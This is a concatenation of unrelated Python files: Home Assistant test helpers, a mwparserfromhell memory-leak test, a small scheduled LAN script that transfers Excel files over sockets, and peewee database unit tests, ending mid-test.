"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_stop_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest(),
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
memtest.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Ben Kurtovic <ben.kurtovic@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tests for memory leaks in the CTokenizer. Python 2 and 3 compatible.
This appears to work mostly fine under Linux, but gives an absurd number of
false positives on OS X. I'm not sure why. Running the tests multiple times
yields different results (tests don't always leak, and the amount they leak by
varies). Increasing the number of loops results in a smaller bytes/loop value,
too, indicating the increase in memory usage might be due to something else.
Actual memory leaks typically leak very large amounts of memory (megabytes)
and scale with the number of loops.
"""
from __future__ import unicode_literals, print_function
from locale import LC_ALL, setlocale
from multiprocessing import Process, Pipe
from os import listdir, path
import sys
import psutil
from mwparserfromhell.compat import py3k
from mwparserfromhell.parser._tokenizer import CTokenizer
if sys.version_info[0] == 2:
range = xrange
LOOPS = 10000
class Color(object):
GRAY = "\x1b[30;1m"
GREEN = "\x1b[92m"
YELLOW = "\x1b[93m"
RESET = "\x1b[0m"
class MemoryTest(object):
"""Manages a memory test."""
def __init__(self):
self._tests = []
self._load()
def _parse_file(self, name, text):
tests = text.split("\n---\n")
counter = 1
digits = len(str(len(tests)))
for test in tests:
data = {"name": None, "label": None, "input": None, "output": None}
for line in test.strip().splitlines():
if line.startswith("name:"):
data["name"] = line[len("name:"):].strip()
elif line.startswith("label:"):
data["label"] = line[len("label:"):].strip()
elif line.startswith("input:"):
raw = line[len("input:"):].strip()
if raw[0] == '"' and raw[-1] == '"':
raw = raw[1:-1]
raw = raw.encode("raw_unicode_escape")
data["input"] = raw.decode("unicode_escape")
number = str(counter).zfill(digits)
fname = "test_{0}{1}_{2}".format(name, number, data["name"])
self._tests.append((fname, data["input"]))
counter += 1
def _load(self):
def load_file(filename):
with open(filename, "rU") as fp:
text = fp.read()
if not py3k:
text = text.decode("utf8")
name = path.split(filename)[1][:0-len(extension)]
self._parse_file(name, text)
root = path.split(path.dirname(path.abspath(__file__)))[0]
directory = path.join(root, "tests", "tokenizer")
extension = ".mwtest"
if len(sys.argv) > 2 and sys.argv[1] == "--use":
for name in sys.argv[2:]:
load_file(path.join(directory, name + extension))
sys.argv = [sys.argv[0]] # So unittest doesn't try to load these
else:
for filename in listdir(directory):
if not filename.endswith(extension):
continue
load_file(path.join(directory, filename))
@staticmethod
def _print_results(info1, info2):
r1, r2 = info1.rss, info2.rss
buff = 8192
if r2 - buff > r1:
d = r2 - r1
p = float(d) / r1
bpt = d // LOOPS
tmpl = "{0}LEAKING{1}: {2:n} bytes, {3:.2%} inc ({4:n} bytes/loop)"
sys.stdout.write(tmpl.format(Color.YELLOW, Color.RESET, d, p, bpt))
else:
sys.stdout.write("{0}OK{1}".format(Color.GREEN, Color.RESET))
def run(self):
"""Run the memory test suite."""
width = 1
for (name, _) in self._tests:
if len(name) > width:
width = len(name)
tmpl = "{0}[{1:03}/{2}]{3} {4}: "
for i, (name, text) in enumerate(self._tests, 1):
sys.stdout.write(tmpl.format(Color.GRAY, i, len(self._tests),
Color.RESET, name.ljust(width)))
sys.stdout.flush()
parent, child = Pipe()
p = Process(target=_runner, args=(text, child))
p.start()
try:
proc = psutil.Process(p.pid)
parent.recv()
parent.send("OK")
parent.recv()
info1 = proc.get_memory_info()
sys.stdout.flush()
parent.send("OK")
parent.recv()
info2 = proc.get_memory_info()
self._print_results(info1, info2)
sys.stdout.flush()
parent.send("OK")
finally:
proc.kill()
print()
def _runner(text, child):
r1, r2 = range(250), range(LOOPS)
for i in r1:
CTokenizer().tokenize(text)
child.send("OK")
child.recv()
child.send("OK")
child.recv()
for i in r2:
CTokenizer().tokenize(text)
child.send("OK")
child.recv()
if __name__ == "__main__":
setlocale(LC_ALL, "")
MemoryTest().run()
|
localserver.py | import socket
import tqdm
import os
import time
import multiprocessing
import openpyxl
import threading
from openpyxl import Workbook
import openpyxl as xl;
import schedule
def recvr(h,p):
SERVER_HOST = h
SERVER_PORT = p
if p==5001:
pi=1
if p==5003:
pi=2
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
s = socket.socket()
try:
s.bind((SERVER_HOST, SERVER_PORT))
except:
o="Unable to bind"
return o
while True:
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
client_socket, address = s.accept()
print(f"[+] {address} is connected.")
recd = client_socket.recv(BUFFER_SIZE)
try:
received = recd.decode()
except:
u="Unable to recieve, Please retake image"
print(u)
return u
filename, filesize = received.split(SEPARATOR)
filesize = int(filesize)
progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for _ in progress:
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
break
f.write(bytes_read)
progress.update(len(bytes_read))
break
s.close()
print("server closed")
time.sleep(1)
#sendr()
# if pi==1:
# time.sleep(0.1)
# s1.start()
# time.sleep(0.1)
# if pi==2:
# time.sleep(0.1)
# s2.start()
# time.sleep(0.1)
def sendr():
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 4096 # send 4096 bytes each time step
# the ip address or hostname of the server, the receiver
host = "192.168.0.104"
# the port, let's use 5001
port = 5003
# the name of file we want to send, make sure it exists
filename = "source.xlsx"
# get the file size
filesize = os.path.getsize(filename)
# create the client socket
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
# send the filename and filesize
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
# start sending the file
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
s.close()
def sendr2():
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 4096 # send 4096 bytes each time step
# the ip address or hostname of the server, the receiver
host = "192.168.0.104"
# the port, let's use 5001
port = 5005
# the name of file we want to send, make sure it exists
filename = "source.xlsx"
# get the file size
filesize = os.path.getsize(filename)
# create the client socket
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
# send the filename and filesize
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
# start sending the file
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
s.close()
def serr():
workbook = Workbook()
sheet = workbook.active
workbook.save(filename="source.xlsx")
filename ="template.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
filename1 ="source.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.active
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
wb0 = openpyxl.load_workbook('Emp.xlsx')
ws0 = wb0.active
wb1 = openpyxl.load_workbook('Emp2.xlsx')
ws1 = wb1.active
wb2 = openpyxl.load_workbook('source.xlsx')
ws2 = wb2.active
for src, dst in zip(ws1['D:D'], ws2['D:D']):
dst.value = src.value
for src, dst in zip(ws0['D:D'], ws2['D:D']):
if not dst.value:
dst.value = src.value
for src, dst in zip(ws1['E:E'], ws2['E:E']):
dst.value = src.value
for src, dst in zip(ws0['E:E'], ws2['E:E']):
if not dst.value:
dst.value = src.value
wb2.save('source.xlsx')
time.sleep(0.5)
#os.remove("source.xlsx")
h1='0.0.0.0'
h2='0.0.0.0'
p1=5001
p2=5002
su1=5003
su2=5005
p1 = multiprocessing.Process(target=recvr, args=(h1,p1,))
p2 = multiprocessing.Process(target=recvr, args=(h2,p2,))
s1 = multiprocessing.Process(target=sendr, args=(su1,))
s2 = multiprocessing.Process(target=sendr, args=(su2,))
t1 = threading.Thread(target=sendr)
t2 = threading.Thread(target=sendr2)
def main():
p1.start()
time.sleep(0.1)
p2.start()
time.sleep(0.1)
time.sleep(0.1)
p1.join()
p2.join()
serr()
t1.start()
time.sleep(0.5)
t2.start()
time.sleep(0.5)
t1.join()
time.sleep(0.5)
t2.join()
time.sleep(0.5)
if __name__ == "__main__":
multiprocessing.freeze_support()
schedule.every().day.at("10:23").do(main)
schedule.every().day.at("17:52").do(main)
while True:
schedule.run_pending() |
database.py | from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import re
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import IS_MYSQL
from .base import IS_POSTGRESQL
from .base import IS_SQLITE
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import requires_postgresql
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
database = db_loader('sqlite3')
def test_pragmas(self):
self.database.cache_size = -2048
self.assertEqual(self.database.cache_size, -2048)
self.database.cache_size = -4096
self.assertEqual(self.database.cache_size, -4096)
self.database.foreign_keys = 'on'
self.assertEqual(self.database.foreign_keys, 1)
self.database.foreign_keys = 'off'
self.assertEqual(self.database.foreign_keys, 0)
def test_timeout_semantics(self):
self.assertEqual(self.database.timeout, 5)
self.assertEqual(self.database.pragma('busy_timeout'), 5000)
self.database.timeout = 2.5
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
self.database.close()
self.database.connect()
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
def test_pragmas_deferred(self):
pragmas = (('journal_mode', 'wal'),)
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
# Test pragmas preserved after initializing.
db.init(':memory:')
self.assertEqual(db._pragmas, pragmas)
db = SqliteDatabase(None)
self.assertEqual(db._pragmas, ())
# Test pragmas are set and subsequently overwritten.
db.init(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
db.init(':memory:', pragmas=())
self.assertEqual(db._pragmas, ())
# Test when specified twice, the previous value is overwritten.
db = SqliteDatabase(None, pragmas=pragmas)
db.init(':memory:', pragmas=(('cache_size', -8000),))
self.assertEqual(db._pragmas, (('cache_size', -8000),))
def test_pragmas_as_dict(self):
pragmas = {'journal_mode': 'wal'}
pragma_list = [('journal_mode', 'wal')]
db = SqliteDatabase(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
# Test deferred databases correctly handle pragma dicts.
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:')
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:', pragmas={})
self.assertEqual(db._pragmas, [])
def test_pragmas_permanent(self):
db = SqliteDatabase(':memory:')
db.execute_sql('pragma foreign_keys=0')
self.assertEqual(db.foreign_keys, 0)
db.pragma('foreign_keys', 1, True)
self.assertEqual(db.foreign_keys, 1)
db.close()
db.connect()
self.assertEqual(db.foreign_keys, 1)
def test_context_settings(self):
class TestDatabase(Database):
field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
operations = {'LIKE': '~', 'NEW': '->>'}
param = '$'
test_db = TestDatabase(None)
state = test_db.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], FIELD.INT)
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
self.assertEqual(state.operations['LIKE'], '~')
self.assertEqual(state.operations['NEW'], '->>')
self.assertEqual(state.operations['ILIKE'], 'ILIKE')
self.assertEqual(state.param, '$')
self.assertEqual(state.quote, '""')
test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
'INT': 'XXX_INT'})
state = test_db2.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], 'XXX_INT')
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
def test_connection_state(self):
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
self.database.close()
self.assertTrue(self.database.is_closed())
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
def test_db_context_manager(self):
self.database.close()
self.assertTrue(self.database.is_closed())
with self.database:
self.assertFalse(self.database.is_closed())
self.assertTrue(self.database.is_closed())
self.database.connect()
self.assertFalse(self.database.is_closed())
# Enter context with an already-open db.
with self.database:
self.assertFalse(self.database.is_closed())
# Closed after exit.
self.assertTrue(self.database.is_closed())
def test_connection_initialization(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
self.assertEqual(state['count'], 0)
conn = db.connection()
self.assertEqual(state['count'], 1)
# Since already connected, nothing happens here.
conn = db.connection()
self.assertEqual(state['count'], 1)
def test_connect_semantics(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
db.connect()
self.assertEqual(state['count'], 1)
self.assertRaises(OperationalError, db.connect)
self.assertEqual(state['count'], 1)
self.assertFalse(db.connect(reuse_if_open=True))
self.assertEqual(state['count'], 1)
with db:
self.assertEqual(state['count'], 1)
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
with db:
self.assertEqual(state['count'], 2)
def test_execute_sql(self):
self.database.execute_sql('CREATE TABLE register (val INTEGER);')
self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
(1337, 31337))
cursor = self.database.execute_sql(
'SELECT val FROM register ORDER BY val')
self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
self.database.execute_sql('DROP TABLE register;')
def test_bind_helpers(self):
db = get_in_memory_db()
alt_db = get_in_memory_db()
class Base(Model):
class Meta:
database = db
class A(Base):
a = TextField()
class B(Base):
b = TextField()
db.create_tables([A, B])
# Temporarily bind A to alt_db.
with alt_db.bind_ctx([A]):
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
self.assertTrue(A.table_exists())
self.assertTrue(B.table_exists())
alt_db.bind([A])
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
db.close()
alt_db.close()
def test_batch_commit(self):
class PatchCommitDatabase(SqliteDatabase):
commits = 0
def begin(self): pass
def commit(self):
self.commits += 1
db = PatchCommitDatabase(':memory:')
def assertBatches(n_objs, batch_size, n_commits):
accum = []
source = range(n_objs)
db.commits = 0
for item in db.batch_commit(source, batch_size):
accum.append(item)
self.assertEqual(accum, list(range(n_objs)))
self.assertEqual(db.commits, n_commits)
assertBatches(12, 1, 12)
assertBatches(12, 2, 6)
assertBatches(12, 3, 4)
assertBatches(12, 4, 3)
assertBatches(12, 5, 3)
assertBatches(12, 6, 2)
assertBatches(12, 7, 2)
assertBatches(12, 11, 2)
assertBatches(12, 12, 1)
assertBatches(12, 13, 1)
def test_server_version(self):
class FakeDatabase(Database):
server_version = None
def _connect(self):
return 1
def _close(self, conn):
pass
def _set_server_version(self, conn):
self.server_version = (1, 33, 7)
db = FakeDatabase(':memory:')
self.assertTrue(db.server_version is None)
db.connect()
self.assertEqual(db.server_version, (1, 33, 7))
db.close()
self.assertEqual(db.server_version, (1, 33, 7))
db.server_version = (1, 2, 3)
db.connect()
self.assertEqual(db.server_version, (1, 2, 3))
db.close()
class TestThreadSafety(ModelTestCase):
nthreads = 4
nrows = 10
requires = [User]
def test_multiple_writers(self):
def create_users(idx):
for i in range(idx * self.nrows, (idx + 1) * self.nrows):
User.create(username='u%d' % i)
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=create_users, args=(i,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(User.select().count(), self.nrows * self.nthreads)
def test_multiple_readers(self):
data = Queue()
def read_user_count(n):
for i in range(n):
data.put(User.select().count())
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=read_user_count,
args=(self.nrows,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(data.qsize(), self.nrows * self.nthreads)
class TestDeferredDatabase(BaseTestCase):
def test_deferred_database(self):
deferred_db = SqliteDatabase(None)
self.assertTrue(deferred_db.deferred)
class DeferredModel(Model):
class Meta:
database = deferred_db
self.assertRaises(Exception, deferred_db.connect)
query = DeferredModel.select()
self.assertRaises(Exception, query.execute)
deferred_db.init(':memory:')
self.assertFalse(deferred_db.deferred)
conn = deferred_db.connect()
self.assertFalse(deferred_db.is_closed())
DeferredModel._schema.create_all()
self.assertEqual(list(DeferredModel.select()), [])
deferred_db.init(None)
self.assertTrue(deferred_db.deferred)
# The connection was automatically closed.
self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
description = TextField()
class Meta:
schema = 'huey'
@requires_postgresql
class TestSchemaNamespace(ModelTestCase):
requires = [CatToy]
def setUp(self):
with self.database:
self.execute('CREATE SCHEMA huey;')
super(TestSchemaNamespace, self).setUp()
def tearDown(self):
super(TestSchemaNamespace, self).tearDown()
with self.database:
self.execute('DROP SCHEMA huey;')
def test_schema(self):
toy = CatToy.create(description='fur mouse')
toy_db = CatToy.select().where(CatToy.id == toy.id).get()
self.assertEqual(toy.id, toy_db.id)
self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
database = db_loader('sqlite3')
requires = [User]
def test_sqlite_isolation(self):
for username in ('u1', 'u2', 'u3'): User.create(username=username)
new_db = db_loader('sqlite3')
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 3)
self.assertEqual(User.select().count(), 3)
self.assertEqual(User.delete().execute(), 3)
with self.database.atomic():
User.create(username='u4')
User.create(username='u5')
# Second conn does not see the changes.
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Third conn does not see the changes.
new_db2 = db_loader('sqlite3')
curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Original connection sees its own changes.
self.assertEqual(User.select().count(), 2)
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
name = CharField(unique=True)
class IndexedModel(TestModel):
first = CharField()
last = CharField()
dob = DateField()
class Meta:
indexes = (
(('first', 'last', 'dob'), True),
(('first', 'last'), False),
)
class Note(TestModel):
content = TextField()
ts = DateTimeField()
status = IntegerField()
class Meta:
table_name = 'notes'
class TestIntrospection(ModelTestCase):
requires = [Category, User, UniqueModel, IndexedModel]
def test_table_exists(self):
self.assertTrue(self.database.table_exists(User._meta.table_name))
self.assertFalse(self.database.table_exists('nuggies'))
def test_get_tables(self):
tables = self.database.get_tables()
required = set(m._meta.table_name for m in self.requires)
self.assertTrue(required.issubset(set(tables)))
UniqueModel._schema.drop_all()
tables = self.database.get_tables()
self.assertFalse(UniqueModel._meta.table_name in tables)
def test_get_indexes(self):
indexes = self.database.get_indexes('unique_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('unique_model_pkey', 'PRIMARY')]
self.assertEqual(data, [
('unique_model_name', ['name'], True, 'unique_model')])
indexes = self.database.get_indexes('indexed_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('indexed_model_pkey', 'PRIMARY')]
self.assertEqual(sorted(data), [
('indexed_model_first_last', ['first', 'last'], False,
'indexed_model'),
('indexed_model_first_last_dob', ['first', 'last', 'dob'], True,
'indexed_model')])
def test_get_columns(self):
columns = self.database.get_columns('indexed_model')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('id', False, True, 'indexed_model'),
('first', False, False, 'indexed_model'),
('last', False, False, 'indexed_model'),
('dob', False, False, 'indexed_model')])
columns = self.database.get_columns('category')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('name', False, True, 'category'),
('parent_id', True, False, 'category')])
def test_get_primary_keys(self):
primary_keys = self.database.get_primary_keys('users')
self.assertEqual(primary_keys, ['id'])
primary_keys = self.database.get_primary_keys('category')
self.assertEqual(primary_keys, ['name'])
@requires_models(Note)
def test_get_views(self):
def normalize_view_meta(view_meta):
sql_ws_norm = re.sub('\n\s+', ' ', view_meta.sql)
return view_meta.name, (sql_ws_norm
.replace('`peewee_test`.', '')
.replace('`notes`.', '')
.replace('`', ''))
def assertViews(expected):
# Create two sample views.
self.database.execute_sql('CREATE VIEW notes_public AS '
'SELECT content, ts FROM notes '
'WHERE status = 1 ORDER BY ts DESC')
self.database.execute_sql('CREATE VIEW notes_deleted AS '
'SELECT content FROM notes '
'WHERE status = 9 ORDER BY id DESC')
try:
views = self.database.get_views()
normalized = sorted([normalize_view_meta(v) for v in views])
self.assertEqual(normalized, expected)
# Ensure that we can use get_columns to introspect views.
columns = self.database.get_columns('notes_deleted')
self.assertEqual([c.name for c in columns], ['content'])
columns = self.database.get_columns('notes_public')
self.assertEqual([c.name for c in columns], ['content', 'ts'])
finally:
self.database.execute_sql('DROP VIEW notes_public;')
self.database.execute_sql('DROP VIEW notes_deleted;')
# Unfortunately, all databases seem to represent VIEW definitions
# differently internally.
if IS_SQLITE:
assertViews([
('notes_deleted', ('CREATE VIEW notes_deleted AS '
'SELECT content FROM notes '
'WHERE status = 9 ORDER BY id DESC')),
('notes_public', ('CREATE VIEW notes_public AS '
'SELECT content, ts FROM notes '
'WHERE status = 1 ORDER BY ts DESC'))])
elif IS_MYSQL:
assertViews([
('notes_deleted',
('select content AS content from notes '
'where status = 9 order by id desc')),
('notes_public',
('select content AS content,ts AS ts from notes '
'where status = 1 order by ts desc'))])
elif IS_POSTGRESQL:
assertViews([
('notes_deleted',
('SELECT notes.content FROM notes '
'WHERE (notes.status = 9) ORDER BY notes.id DESC;')),
('notes_public',
('SELECT notes.content, notes.ts FROM notes '
'WHERE (notes.status = 1) ORDER BY notes.ts DESC;'))])
@requires_models(User, Tweet, Category)
def test_get_foreign_keys(self):
foreign_keys = self.database.get_foreign_keys('tweet')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('user_id', 'users', 'id', 'tweet')])
foreign_keys = self.database.get_foreign_keys('category')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
